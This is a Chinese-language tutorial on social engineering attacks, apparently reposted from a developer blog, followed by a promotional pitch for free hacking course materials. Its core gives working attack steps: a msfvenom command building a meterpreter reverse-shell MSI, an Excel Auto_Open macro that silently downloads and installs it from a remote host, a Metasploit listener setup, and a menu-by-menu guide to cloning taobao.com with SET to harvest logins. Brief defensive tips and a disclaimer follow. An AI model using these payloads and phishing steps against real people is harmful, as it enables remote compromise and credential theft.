前言
1. 社工概述
不是技术性攻击,利用的人类弱点,利用欺骗,操纵,诱骗
利用被授权的人(公司财务、公司人事,公司网络管理员,开发人员)
存在风险
技术漏洞 vs 人的漏洞;渗透 vs 社工
人的漏洞比系统技术的漏洞危害更大,82%漏洞来自人
【----帮助零基础学习,以下所有学习资料文末免费领!----】
1.1 电信诈骗手段
社会工程学利用了人类多种弱点
1、好奇心2、信任3、恐惧4、无知5、疏忽
1.2 社工策略
2. 社工攻击流程
1、收集目标信息(人事、保安、运维……) 社交网站、冒充身份获取、社工库、远控
2、伪造身份与目标接触(求职者、维修工、同事)
3、编造谎言迷惑目标(发送邮件、连接网络、进 入机房)
4、展开攻击(接入网络、控制机器、窃取信息)
信息搜集
个人信息收集内容与方法 https://mp.weixin.qq.com/s/dt2yHvWDIcdpnC3ag5gXsw
个人信息泄露查询
https://monitor.firefox.com/
https://haveibeenpwned.com/
注册查询 https://www.reg007.com/ http://regbao.com/
阿里云实名认证接口 https://market.aliyun.com/products/57000002/cmapi025518.html
火狐自带的泄漏查询
https://monitor.firefox.com/
外网查泄漏
https://haveibeenpwned.com/
查询手机注册过的网站
https://www.reg007.com/http://regbao.com/
3. 社工案例&工具
3.1 钓鱼邮件
1、获得邮箱地址或者账号密码
2、伪造发件人邮件地址(不一定能成功)
3、撰写有吸引力的主题
4、撰写有说服力的内容
5、诱导点击或者下载
3.2 msi宏文件
msfvenom生成msi宏文件
1、获得邮箱地址或者账号密码
利用kali生成一个宏病毒
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.132 lport=4444 -f msi -o hack.msi
新建excel文件,保存为xlsm
=EXEC("msiexec /q /I http://192.168.142.66/hack.msi") =HALT()
将第一行模式修改为:
Auto_Open
并Enter回车,自动运行宏。
office 宏病毒MSF监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.142.132
set lport 4444
run
3.3 钓鱼网站
1、注册类似域名;伪造子域名
2、仿冒界面
3、记录用户输入内容
kali工具 setoolkit
直接可以克隆一个网站
如果在其他操作系统中克隆,更换social-engineer地址即可
https://github.com/trustedsec/social-engineer-toolkit.git
3.4 SET克隆网站步骤
(1)开启kali
首先开启kali,打开root窗口
启动工具
setoolkit
工具设置注释
Social-Engineering Attacks——社工
Website Attack Vectors——网站
Credential Harvester Attack Method——凭据
Site Cloner——站点克隆
(2)设置选择
我们先选社工工程学攻击(1回车)
然后选攻击网站(2)
选攻击网站的凭据(3)
克隆站点(2)
(3)输入克隆网站
直接默认回车,然后输入想要克隆的网页
https://www.taobao.com/
直接回车
克隆成功,查看克隆网站
假设此刻有用户输入登录信息
用户回车登录,就会在后台显示登录名和密码
3.5 badusb
可以监控键盘的操作
1、刻录代码
https://store.arduino.cc/usa/arduino-leonardo-with-headers
2、扔下U盘
3、恶意代码自动运行
3.6 近源攻击
1、面试入职
2、在公司附近连接公司WiFi
3、无人机破解WiFi/制作钓鱼WiFi(fluxion)
可以制作一个同名的WiFi,一旦连上可以抓包
https://www.bilibili.com/read/cv21608887/
4、……
5、美女、金钱、送人情
4. 社工防范
1、身份确认:是这个人吗?有权限吗?
2、切勿轻易点击链接和打开文件
3、启用多重身份认证
4、运行杀毒软件;更新
5、不连接到不安全的WiFi
6、在社交网络中隐藏个人信息
7、安全培训;攻防演练
原文地址: https://developer.aliyun.com/article/1300706?spm=a2c6h.12873639.article-detail.108.33b7504evl9ae9&scm=20140722.ID_community@@article@@1300706._.ID_community@@article@@1300706-OR_rec-V_1-RL_community@@article@@1300680
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。 所有渗透都需获取授权!
@学习更多渗透技能!体验靶场实战练习
拿下NISP-SO网络安全证书之后,身为普通的你可以:
跨越90%企业的招聘硬门槛
增加70%就业机会
拿下BAT全国TOP100大厂敲门砖
体系化得到网络技术硬实力
IE大佬年薪可达30w+
如何入门学习网络安全【黑客】
【----帮助网安学习,以下所有学习资料文末免费领取!----】
> ① 网安学习成长路径思维导图
> ② 60+网安经典常用工具包
> ③ 100+SRC漏洞分析报告
> ④ 150+网安攻防实战技术电子书
> ⑤ 最权威CISSP 认证考试指南+题库
> ⑥ 超1800页CTF实战技巧手册
> ⑦ 最新网安大厂面试题合集(含答案)
> ⑧ APP客户端安全检测指南(安卓+IOS)
大纲
首先要找一份详细的大纲。
学习教程
第一阶段:零基础入门系列教程
该阶段学完即可年薪15w+
第二阶段:技术入门
弱口令与口令爆破
XSS漏洞
CSRF漏洞
SSRF漏洞
XXE漏洞
SQL注入
任意文件操作漏洞
业务逻辑漏洞
该阶段学完年薪25w+
阶段三:高阶提升
反序列化漏洞
RCE
综合靶场实操项目
内网渗透
流量分析
日志分析
恶意代码分析
应急响应
实战训练
该阶段学完即可年薪30w+
CTF比赛视频+题库+答案汇总
实战训练营
面试刷题
最后,我其实要给部分人泼冷水,因为说实话,上面讲到的资料包获取没有任何的门槛。
但是,我觉得很多人拿到了却并不会去学习。
大部分人的问题看似是“如何行动”,其实是“无法开始”。
几乎任何一个领域都是这样,所谓“万事开头难”,绝大多数人都卡在第一步,还没开始就自己把自己淘汰出局了。
如果你真的确信自己喜欢网络安全/黑客技术,马上行动起来,比一切都重要。
资料领取
上述这份完整版的网络安全学习资料已经上传网盘,朋友们如果需要可以微信扫描下方二维码 即可自动领取↓↓↓
或者
【点此链接】领取